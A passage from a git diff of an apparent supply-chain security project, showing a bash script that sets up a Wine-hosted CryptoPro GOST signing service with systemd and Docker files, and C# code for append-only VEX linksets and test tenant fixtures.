+ if wine reg query "HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Crypto-Pro GOST R 34.10-2012" 2>/dev/null; then
+ log_info "CryptoPro CSP installed successfully"
+ else
+ log_warn "CryptoPro CSP may not be registered correctly"
+ fi
+}
+
+# Build WineCspService for Windows
+build_service() {
+ log_info "Building WineCspService..."
+
+ mkdir -p "$OUTPUT_DIR"
+
+ # Build for Windows x64
+ dotnet publish "$SERVICE_DIR/WineCspService.csproj" \
+ -c Release \
+ -r win-x64 \
+ --self-contained true \
+ -o "$OUTPUT_DIR" \
+ || {
+ log_error "Build failed"
+ exit 1
+ }
+
+ log_info "Service built: $OUTPUT_DIR/WineCspService.exe"
+}
+
+# Create launcher script
+create_launcher() {
+ log_info "Creating launcher script..."
+
+ cat > "$OUTPUT_DIR/run-wine-csp-service.sh" << EOF
+#!/bin/bash
+# Wine CSP Service Launcher
+# Generated by setup-wine-csp-service.sh
+
+export WINEPREFIX="$WINE_PREFIX"
+export WINEDEBUG="-all" # Suppress Wine debug output
+
+PORT=\${WINE_CSP_PORT:-$WINE_CSP_PORT}
+SERVICE_DIR="\$(dirname "\$0")"
+
+echo "Starting Wine CSP Service on port \$PORT..."
+echo "Wine prefix: \$WINEPREFIX"
+echo ""
+
+cd "\$SERVICE_DIR"
+exec wine WineCspService.exe --urls "http://0.0.0.0:\$PORT"
+EOF
+
+ chmod +x "$OUTPUT_DIR/run-wine-csp-service.sh"
+ log_info "Launcher created: $OUTPUT_DIR/run-wine-csp-service.sh"
+}
+
+# Create systemd service file
+create_systemd_service() {
+ log_info "Creating systemd service file..."
+
+ cat > "$OUTPUT_DIR/wine-csp-service.service" << EOF
+[Unit]
+Description=Wine CSP Service for CryptoPro GOST signing
+After=network.target
+
+[Service]
+Type=simple
+User=$USER
+Environment=WINEPREFIX=$WINE_PREFIX
+Environment=WINEDEBUG=-all
+Environment=WINE_CSP_PORT=$WINE_CSP_PORT
+WorkingDirectory=$OUTPUT_DIR
+ExecStart=/bin/bash $OUTPUT_DIR/run-wine-csp-service.sh
+Restart=on-failure
+RestartSec=5
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+ log_info "Systemd service file created: $OUTPUT_DIR/wine-csp-service.service"
+ log_info "To install: sudo cp $OUTPUT_DIR/wine-csp-service.service /etc/systemd/system/"
+ log_info "To enable: sudo systemctl enable --now wine-csp-service"
+}
+
+# Create Docker Compose configuration
+create_docker_compose() {
+ log_info "Creating Docker Compose configuration..."
+
+ cat > "$OUTPUT_DIR/docker-compose.yml" << EOF
+# Wine CSP Service - Docker Compose configuration
+# Requires: Docker with Wine support or Windows container
+version: '3.8'
+
+services:
+ wine-csp-service:
+ build:
+ context: .
+ dockerfile: Dockerfile.wine
+ ports:
+ - "${WINE_CSP_PORT}:5099"
+ environment:
+ - ASPNETCORE_URLS=http://+:5099
+ volumes:
+ # Mount CSP installer if available
+ - ./csp-installer:/installer:ro
+ # Persist Wine prefix for keys/certificates
+ - wine-prefix:/root/.wine
+ healthcheck:
+ test: ["CMD", "curl", "-f", "http://localhost:5099/health"]
+ interval: 30s
+ timeout: 10s
+ retries: 3
+
+volumes:
+ wine-prefix:
+EOF
+
+ # Create Dockerfile
+ cat > "$OUTPUT_DIR/Dockerfile.wine" << 'EOF'
+# Wine CSP Service Dockerfile
+FROM ubuntu:22.04
+
+# Install Wine and dependencies
+RUN dpkg --add-architecture i386 && \
+ apt-get update && \
+ apt-get install -y --no-install-recommends \
+ wine64 \
+ wine32 \
+ winetricks \
+ curl \
+ ca-certificates \
+ && rm -rf /var/lib/apt/lists/*
+
+# Initialize Wine prefix
+RUN wineboot --init && \
+ winetricks -q vcrun2019 || true
+
+# Copy service
+WORKDIR /app
+COPY WineCspService.exe .
+COPY *.dll ./
+
+# Expose port
+EXPOSE 5099
+
+# Health check
+HEALTHCHECK --interval=30s --timeout=10s --retries=3 \
+ CMD curl -f http://localhost:5099/health || exit 1
+
+# Run service
+CMD ["wine", "WineCspService.exe", "--urls", "http://0.0.0.0:5099"]
+EOF
+
+ log_info "Docker configuration created in $OUTPUT_DIR/"
+}
+
+# Test the service
+test_service() {
+ log_info "Testing service startup..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+ export WINEDEBUG="-all"
+
+ # Start service in background
+ cd "$OUTPUT_DIR"
+ wine WineCspService.exe --urls "http://localhost:$WINE_CSP_PORT" &
+ SERVICE_PID=$!
+
+ # Wait for startup
+ sleep 5
+
+ # Test health endpoint
+ if curl -s "http://localhost:$WINE_CSP_PORT/health" | grep -q "Healthy"; then
+ log_info "Service is running and healthy"
+
+ # Test status endpoint
+ log_info "CSP Status:"
+ curl -s "http://localhost:$WINE_CSP_PORT/status" | python3 -m json.tool 2>/dev/null || \
+ curl -s "http://localhost:$WINE_CSP_PORT/status"
+ else
+ log_warn "Service health check failed"
+ fi
+
+ # Stop service
+ kill $SERVICE_PID 2>/dev/null || true
+ wait $SERVICE_PID 2>/dev/null || true
+}
+
+# Print summary
+print_summary() {
+ echo ""
+ log_info "=========================================="
+ log_info "Wine CSP Service Setup Complete"
+ log_info "=========================================="
+ echo ""
+ echo "Wine prefix: $WINE_PREFIX"
+ echo "Service directory: $OUTPUT_DIR"
+ echo "HTTP port: $WINE_CSP_PORT"
+ echo ""
+ echo "To start the service:"
+ echo " $OUTPUT_DIR/run-wine-csp-service.sh"
+ echo ""
+ echo "To test endpoints:"
+ echo " curl http://localhost:$WINE_CSP_PORT/status"
+ echo " curl http://localhost:$WINE_CSP_PORT/keys"
+ echo " curl -X POST http://localhost:$WINE_CSP_PORT/hash \\"
+ echo " -H 'Content-Type: application/json' \\"
+ echo " -d '{\"dataBase64\":\"SGVsbG8gV29ybGQ=\"}'"
+ echo ""
+ if [[ -z "$CSP_INSTALLER" ]]; then
+ echo "NOTE: CryptoPro CSP is not installed."
+ echo " The service will report 'CSP not available'."
+ echo " To install CSP, run:"
+ echo " $0 --csp-installer /path/to/csp_setup_x64.msi"
+ fi
+}
+
+# Main execution
+main() {
+ log_info "Wine CSP Service Setup"
+ log_info "Repository: $REPO_ROOT"
+
+ check_prerequisites
+ init_wine_prefix
+ install_windows_components
+ install_cryptopro_csp
+ build_service
+ create_launcher
+ create_systemd_service
+ create_docker_compose
+ test_service
+ print_summary
+}
+
+main "$@"
diff --git a/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs b/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
index aa52763fb..fc021b839 100644
--- a/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
+++ b/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
@@ -239,7 +239,8 @@ internal sealed class AttestorSigningKeyRegistry : IDisposable
new CryptoKeyReference(providerKeyId, providerName),
normalizedAlgorithm,
privateKeyBytes,
- now);
+ now,
+ metadata: metadata);
smProvider.UpsertSigningKey(signingKey);
}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
index dee90ff69..008da3e89 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
///
/// Baseline consensus policy applying tier-based weights and enforcing justification gates.
///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class BaselineVexConsensusPolicy : IVexConsensusPolicy
{
private readonly VexConsensusPolicyOptions _options;
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
index 47b6e8a6d..61aa48c37 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
///
/// Policy abstraction supplying trust weights and gating logic for consensus decisions.
///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public interface IVexConsensusPolicy
{
///
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs
new file mode 100644
index 000000000..ce1f342b5
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs
@@ -0,0 +1,340 @@
+using System.Collections.Immutable;
+using Microsoft.Extensions.Logging;
+using StellaOps.Excititor.Core.Canonicalization;
+
+namespace StellaOps.Excititor.Core.Observations;
+
+///
+/// Extracts linkset updates from VEX observations using append-only semantics (AOC-19-013).
+/// Replaces consensus-based extraction with deterministic append-only operations.
+///
+public sealed class AppendOnlyLinksetExtractionService
+{
+ private readonly IAppendOnlyLinksetStore _store;
+ private readonly IVexLinksetEventPublisher? _eventPublisher;
+ private readonly ILogger _logger;
+
+ public AppendOnlyLinksetExtractionService(
+ IAppendOnlyLinksetStore store,
+ ILogger logger,
+ IVexLinksetEventPublisher? eventPublisher = null)
+ {
+ _store = store ?? throw new ArgumentNullException(nameof(store));
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ _eventPublisher = eventPublisher;
+ }
+
+ ///
+ /// Processes observations and appends them to linksets.
+ /// Returns linkset update events for downstream consumers.
+ ///
+ public async Task> ProcessObservationsAsync(
+ string tenant,
+ IEnumerable observations,
+ CancellationToken cancellationToken)
+ {
+ if (string.IsNullOrWhiteSpace(tenant))
+ {
+ throw new ArgumentException("Tenant must be provided.", nameof(tenant));
+ }
+
+ if (observations is null)
+ {
+ return ImmutableArray.Empty;
+ }
+
+ var normalizedTenant = tenant.Trim().ToLowerInvariant();
+ var observationList = observations.Where(o => o is not null).ToList();
+
+ if (observationList.Count == 0)
+ {
+ return ImmutableArray.Empty;
+ }
+
+ // Group by (vulnerabilityId, productKey) deterministically
+ var groups = observationList
+ .SelectMany(obs => obs.Statements.Select(stmt => (obs, stmt)))
+ .GroupBy(x => new LinksetKey(
+ VulnerabilityId: Normalize(x.stmt.VulnerabilityId),
+ ProductKey: Normalize(x.stmt.ProductKey)))
+ .OrderBy(g => g.Key.VulnerabilityId, StringComparer.OrdinalIgnoreCase)
+ .ThenBy(g => g.Key.ProductKey, StringComparer.OrdinalIgnoreCase)
+ .ToList();
+
+ var results = new List(groups.Count);
+
+ foreach (var group in groups)
+ {
+ try
+ {
+ var result = await ProcessGroupAsync(
+ normalizedTenant,
+ group.Key,
+ group.Select(x => x.obs).Distinct(),
+ cancellationToken);
+
+ results.Add(result);
+
+ if (result.HadChanges && _eventPublisher is not null)
+ {
+ await _eventPublisher.PublishLinksetUpdatedAsync(
+ normalizedTenant,
+ result.Linkset,
+ cancellationToken);
+ }
+ }
+ catch (Exception ex)
+ {
+ _logger.LogError(
+ ex,
+ "Failed to process linkset for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
+ normalizedTenant,
+ group.Key.VulnerabilityId,
+ group.Key.ProductKey);
+
+ results.Add(LinksetAppendResult.Failed(
+ normalizedTenant,
+ group.Key.VulnerabilityId,
+ group.Key.ProductKey,
+ ex.Message));
+ }
+ }
+
+ _logger.LogInformation(
+ "Processed {ObservationCount} observations into {LinksetCount} linksets for tenant {Tenant}",
+ observationList.Count,
+ results.Count(r => r.Success),
+ normalizedTenant);
+
+ return results.ToImmutableArray();
+ }
+
+ ///
+ /// Appends a disagreement to a linkset.
+ ///
+ public async Task AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken)
+ {
+ if (string.IsNullOrWhiteSpace(tenant))
+ {
+ throw new ArgumentException("Tenant must be provided.", nameof(tenant));
+ }
+
+ if (disagreement is null)
+ {
+ throw new ArgumentNullException(nameof(disagreement));
+ }
+
+ var normalizedTenant = tenant.Trim().ToLowerInvariant();
+ var normalizedVuln = Normalize(vulnerabilityId);
+ var normalizedProduct = Normalize(productKey);
+
+ try
+ {
+ var storeResult = await _store.AppendDisagreementAsync(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ disagreement,
+ cancellationToken);
+
+ if (storeResult.HadChanges && _eventPublisher is not null)
+ {
+ await _eventPublisher.PublishLinksetUpdatedAsync(
+ normalizedTenant,
+ storeResult.Linkset,
+ cancellationToken);
+ }
+
+ return LinksetAppendResult.Succeeded(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ storeResult.Linkset,
+ storeResult.WasCreated,
+ storeResult.ObservationsAdded,
+ storeResult.DisagreementsAdded,
+ storeResult.SequenceNumber);
+ }
+ catch (Exception ex)
+ {
+ _logger.LogError(
+ ex,
+ "Failed to append disagreement for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct);
+
+ return LinksetAppendResult.Failed(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ ex.Message);
+ }
+ }
+
+ private async Task ProcessGroupAsync(
+ string tenant,
+ LinksetKey key,
+ IEnumerable observations,
+ CancellationToken cancellationToken)
+ {
+ var scope = BuildScope(key.ProductKey);
+ var observationRefs = observations
+ .SelectMany(obs => obs.Statements
+ .Where(stmt => string.Equals(Normalize(stmt.VulnerabilityId), key.VulnerabilityId, StringComparison.OrdinalIgnoreCase)
+ && string.Equals(Normalize(stmt.ProductKey), key.ProductKey, StringComparison.OrdinalIgnoreCase))
+ .Select(stmt => new VexLinksetObservationRefModel(
+ ObservationId: obs.ObservationId,
+ ProviderId: obs.ProviderId,
+ Status: stmt.Status.ToString().ToLowerInvariant(),
+ Confidence: null)))
+ .Distinct(VexLinksetObservationRefComparer.Instance)
+ .ToList();
+
+ if (observationRefs.Count == 0)
+ {
+ return LinksetAppendResult.NoChange(tenant, key.VulnerabilityId, key.ProductKey);
+ }
+
+ var storeResult = await _store.AppendObservationsBatchAsync(
+ tenant,
+ key.VulnerabilityId,
+ key.ProductKey,
+ observationRefs,
+ scope,
+ cancellationToken);
+
+ return LinksetAppendResult.Succeeded(
+ tenant,
+ key.VulnerabilityId,
+ key.ProductKey,
+ storeResult.Linkset,
+ storeResult.WasCreated,
+ storeResult.ObservationsAdded,
+ storeResult.DisagreementsAdded,
+ storeResult.SequenceNumber);
+ }
+
+ private static VexProductScope BuildScope(string productKey)
+ {
+ var canonicalizer = new VexProductKeyCanonicalizer();
+ try
+ {
+ var canonical = canonicalizer.Canonicalize(productKey);
+ var identifiers = canonical.Links
+ .Where(link => link is not null && !string.IsNullOrWhiteSpace(link.Identifier))
+ .Select(link => link.Identifier.Trim())
+ .Distinct(StringComparer.OrdinalIgnoreCase)
+ .ToImmutableArray();
+
+ var purl = canonical.Links.FirstOrDefault(link =>
+ string.Equals(link.Type, "purl", StringComparison.OrdinalIgnoreCase))?.Identifier;
+ var cpe = canonical.Links.FirstOrDefault(link =>
+ string.Equals(link.Type, "cpe", StringComparison.OrdinalIgnoreCase))?.Identifier;
+ var version = ExtractVersion(purl ?? canonical.ProductKey);
+
+ return new VexProductScope(
+ ProductKey: canonical.ProductKey,
+ Type: canonical.Scope.ToString().ToLowerInvariant(),
+ Version: version,
+ Purl: purl,
+ Cpe: cpe,
+ Identifiers: identifiers);
+ }
+ catch
+ {
+ return VexProductScope.Unknown(productKey);
+ }
+ }
+
+ private static string? ExtractVersion(string? key)
+ {
+ if (string.IsNullOrWhiteSpace(key))
+ {
+ return null;
+ }
+
+ var at = key.LastIndexOf('@');
+ return at >= 0 && at < key.Length - 1 ? key[(at + 1)..] : null;
+ }
+
+ private static string Normalize(string value) =>
+ VexObservation.EnsureNotNullOrWhiteSpace(value, nameof(value));
+
+ private sealed record LinksetKey(string VulnerabilityId, string ProductKey);
+}
+
+///
+/// Result of a linkset append operation.
+///
+public sealed record LinksetAppendResult
+{
+ private LinksetAppendResult(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinkset? linkset,
+ bool success,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber,
+ string? errorMessage)
+ {
+ Tenant = tenant;
+ VulnerabilityId = vulnerabilityId;
+ ProductKey = productKey;
+ Linkset = linkset;
+ Success = success;
+ WasCreated = wasCreated;
+ ObservationsAdded = observationsAdded;
+ DisagreementsAdded = disagreementsAdded;
+ SequenceNumber = sequenceNumber;
+ ErrorMessage = errorMessage;
+ }
+
+ public string Tenant { get; }
+ public string VulnerabilityId { get; }
+ public string ProductKey { get; }
+ public VexLinkset? Linkset { get; }
+ public bool Success { get; }
+ public bool WasCreated { get; }
+ public int ObservationsAdded { get; }
+ public int DisagreementsAdded { get; }
+ public long SequenceNumber { get; }
+ public string? ErrorMessage { get; }
+
+ public bool HadChanges => Success && (WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0);
+
+ public static LinksetAppendResult Succeeded(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinkset linkset,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber)
+ => new(tenant, vulnerabilityId, productKey, linkset, success: true,
+ wasCreated, observationsAdded, disagreementsAdded, sequenceNumber, errorMessage: null);
+
+ public static LinksetAppendResult NoChange(
+ string tenant,
+ string vulnerabilityId,
+ string productKey)
+ => new(tenant, vulnerabilityId, productKey, linkset: null, success: true,
+ wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage: null);
+
+ public static LinksetAppendResult Failed(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ string errorMessage)
+ => new(tenant, vulnerabilityId, productKey, linkset: null, success: false,
+ wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage);
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs
new file mode 100644
index 000000000..7d0482761
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs
@@ -0,0 +1,250 @@
+namespace StellaOps.Excititor.Core.Observations;
+
+///
+/// Append-only linkset store interface enforcing AOC-19 contract.
+/// Linksets can only be appended (new observations added), never modified or deleted.
+/// This guarantees deterministic replay and audit trails.
+///
+public interface IAppendOnlyLinksetStore
+{
+ ///
+ /// Appends a new observation to an existing linkset or creates a new linkset.
+ /// Returns the updated linkset with the new observation appended.
+ /// Thread-safe and idempotent (duplicate observations are deduplicated).
+ ///
+ /// Tenant identifier.
+ /// Vulnerability identifier (CVE, GHSA, etc.).
+ /// Product key (PURL, CPE, etc.).
+ /// The observation reference to append.
+ /// Product scope metadata.
+ /// Cancellation token.
+ /// The updated linkset with the appended observation.
+ ValueTask AppendObservationAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinksetObservationRefModel observation,
+ VexProductScope scope,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Appends multiple observations to a linkset in a single atomic operation.
+ ///
+ ValueTask AppendObservationsBatchAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ IEnumerable observations,
+ VexProductScope scope,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Appends a disagreement annotation to an existing linkset.
+ /// Disagreements are append-only and never removed.
+ ///
+ ValueTask AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a linkset by tenant and linkset ID (read-only).
+ ///
+ ValueTask GetByIdAsync(
+ string tenant,
+ string linksetId,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a linkset by vulnerability and product key (read-only).
+ ///
+ ValueTask GetByKeyAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets by vulnerability ID (read-only).
+ ///
+ ValueTask> FindByVulnerabilityAsync(
+ string tenant,
+ string vulnerabilityId,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets by product key (read-only).
+ ///
+ ValueTask> FindByProductKeyAsync(
+ string tenant,
+ string productKey,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets with conflicts/disagreements (read-only).
+ ///
+ ValueTask> FindWithConflictsAsync(
+ string tenant,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Returns the count of linksets for the specified tenant.
+ ///
+ ValueTask CountAsync(
+ string tenant,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Returns the count of linksets with conflicts for the specified tenant.
+ ///
+ ValueTask CountWithConflictsAsync(
+ string tenant,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Gets the append-only event log for a specific linkset.
+ /// Returns all mutations in chronological order for audit/replay.
+ ///
+ ValueTask> GetMutationLogAsync(
+ string tenant,
+ string linksetId,
+ CancellationToken cancellationToken);
+}
+
+///
+/// Result of an append operation on a linkset.
+///
+public sealed record AppendLinksetResult
+{
+ private AppendLinksetResult(
+ VexLinkset linkset,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber)
+ {
+ Linkset = linkset ?? throw new ArgumentNullException(nameof(linkset));
+ WasCreated = wasCreated;
+ ObservationsAdded = observationsAdded;
+ DisagreementsAdded = disagreementsAdded;
+ SequenceNumber = sequenceNumber;
+ }
+
+ ///
+ /// The updated linkset.
+ ///
+ public VexLinkset Linkset { get; }
+
+ ///
+ /// True if the linkset was newly created by this operation.
+ ///
+ public bool WasCreated { get; }
+
+ ///
+ /// Number of new observations added (0 if deduplicated).
+ ///
+ public int ObservationsAdded { get; }
+
+ ///
+ /// Number of new disagreements added (0 if deduplicated).
+ ///
+ public int DisagreementsAdded { get; }
+
+ ///
+ /// Monotonic sequence number for this mutation (for ordering/replay).
+ ///
+ public long SequenceNumber { get; }
+
+ ///
+ /// True if any data was actually appended.
+ ///
+ public bool HadChanges => WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0;
+
+ public static AppendLinksetResult Created(VexLinkset linkset, int observationsAdded, long sequenceNumber)
+ => new(linkset, wasCreated: true, observationsAdded, disagreementsAdded: 0, sequenceNumber);
+
+ public static AppendLinksetResult Updated(VexLinkset linkset, int observationsAdded, int disagreementsAdded, long sequenceNumber)
+ => new(linkset, wasCreated: false, observationsAdded, disagreementsAdded, sequenceNumber);
+
+ public static AppendLinksetResult NoChange(VexLinkset linkset, long sequenceNumber)
+ => new(linkset, wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber);
+}
+
+///
+/// Represents a mutation event in the append-only linkset log.
+/// Used for audit trails and deterministic replay.
+///
+public sealed record LinksetMutationEvent
+{
+ public LinksetMutationEvent(
+ long sequenceNumber,
+ string mutationType,
+ DateTimeOffset timestamp,
+ string? observationId,
+ string? providerId,
+ string? status,
+ double? confidence,
+ string? justification)
+ {
+ SequenceNumber = sequenceNumber;
+ MutationType = mutationType ?? throw new ArgumentNullException(nameof(mutationType));
+ Timestamp = timestamp.ToUniversalTime();
+ ObservationId = observationId;
+ ProviderId = providerId;
+ Status = status;
+ Confidence = confidence;
+ Justification = justification;
+ }
+
+ ///
+ /// Monotonic sequence number for ordering.
+ ///
+ public long SequenceNumber { get; }
+
+ ///
+ /// Type of mutation: "observation_added", "disagreement_added", "linkset_created".
+ ///
+ public string MutationType { get; }
+
+ ///
+ /// When this mutation occurred.
+ ///
+ public DateTimeOffset Timestamp { get; }
+
+ ///
+ /// Observation ID (for observation mutations).
+ ///
+ public string? ObservationId { get; }
+
+ ///
+ /// Provider ID.
+ ///
+ public string? ProviderId { get; }
+
+ ///
+ /// Status value.
+ ///
+ public string? Status { get; }
+
+ ///
+ /// Confidence value.
+ ///
+ public double? Confidence { get; }
+
+ ///
+ /// Justification (for disagreement mutations).
+ ///
+ public string? Justification { get; }
+
+ public static class MutationTypes
+ {
+ public const string LinksetCreated = "linkset_created";
+ public const string ObservationAdded = "observation_added";
+ public const string DisagreementAdded = "disagreement_added";
+ }
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs
new file mode 100644
index 000000000..96cc47731
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs
@@ -0,0 +1,264 @@
+using System.Collections.Immutable;
+using System.Text.Json;
+
+namespace StellaOps.Excititor.Core.Testing;
+
+///
+/// Utility for seeding Authority tenants in test scenarios (AOC-19-004).
+/// Provides deterministic tenant fixtures with configurable settings.
+///
+public sealed class AuthorityTenantSeeder
+{
+ private readonly List _tenants = new();
+ private readonly HashSet _usedSlugs = new(StringComparer.OrdinalIgnoreCase);
+
+ ///
+ /// Default test tenant for single-tenant scenarios.
+ ///
+ public static TestTenant DefaultTenant { get; } = new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000001"),
+ Slug: "test",
+ Name: "Test Tenant",
+ Description: "Default test tenant for unit tests",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+
+ ///
+ /// Multi-tenant test fixtures (Acme, Beta, Gamma).
+ ///
+ public static ImmutableArray MultiTenantFixtures { get; } = ImmutableArray.Create(
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000010"),
+ Slug: "acme",
+ Name: "Acme Corp",
+ Description: "Primary test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: new TestTenantMetadata(
+ Environment: "test",
+ Region: "us-east-1",
+ Tier: "enterprise",
+ Features: ImmutableArray.Create("vex-ingestion", "policy-engine", "graph-explorer"))),
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000020"),
+ Slug: "beta",
+ Name: "Beta Inc",
+ Description: "Secondary test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default with { MaxProviders = 5 },
+ Metadata: new TestTenantMetadata(
+ Environment: "test",
+ Region: "eu-west-1",
+ Tier: "professional",
+ Features: ImmutableArray.Create("vex-ingestion"))),
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000030"),
+ Slug: "gamma",
+ Name: "Gamma Ltd",
+ Description: "Disabled test tenant",
+ Enabled: false,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default));
+
+ ///
+ /// Airgap test tenant with restricted settings.
+ ///
+ public static TestTenant AirgapTenant { get; } = new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000099"),
+ Slug: "airgap-test",
+ Name: "Airgap Test Tenant",
+ Description: "Tenant for airgap/offline testing",
+ Enabled: true,
+ Settings: TestTenantSettings.Airgap,
+ Metadata: new TestTenantMetadata(
+ Environment: "airgap",
+ Region: "isolated",
+ Tier: "enterprise",
+ Features: ImmutableArray.Create("vex-ingestion", "offline-mode", "mirror-import")));
+
+ ///
+ /// Creates a new seeder instance.
+ ///
+ public AuthorityTenantSeeder()
+ {
+ }
+
+ ///
+ /// Adds the default test tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithDefaultTenant()
+ {
+ AddTenant(DefaultTenant);
+ return this;
+ }
+
+ ///
+ /// Adds multi-tenant fixtures to the seed set.
+ ///
+ public AuthorityTenantSeeder WithMultiTenantFixtures()
+ {
+ foreach (var tenant in MultiTenantFixtures)
+ {
+ AddTenant(tenant);
+ }
+ return this;
+ }
+
+ ///
+ /// Adds the airgap test tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithAirgapTenant()
+ {
+ AddTenant(AirgapTenant);
+ return this;
+ }
+
+ ///
+ /// Adds a custom tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithTenant(TestTenant tenant)
+ {
+ AddTenant(tenant);
+ return this;
+ }
+
+ ///
+ /// Adds a custom tenant with minimal configuration.
+ ///
+ public AuthorityTenantSeeder WithTenant(string slug, string name, bool enabled = true)
+ {
+ var tenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: slug,
+ Name: name,
+ Description: null,
+ Enabled: enabled,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+ AddTenant(tenant);
+ return this;
+ }
+
+ ///
+ /// Gets all tenants in the seed set.
+ ///
+ public IReadOnlyList GetTenants() => _tenants.ToList();
+
+ ///
+ /// Gets tenant slugs for use in test data generation.
+ ///
+ public IReadOnlyList GetSlugs() => _tenants.Select(t => t.Slug).ToList();
+
+ ///
+ /// Generates SQL INSERT statements for seeding tenants.
+ ///
+ public string GenerateSql()
+ {
+ if (_tenants.Count == 0)
+ {
+ return string.Empty;
+ }
+
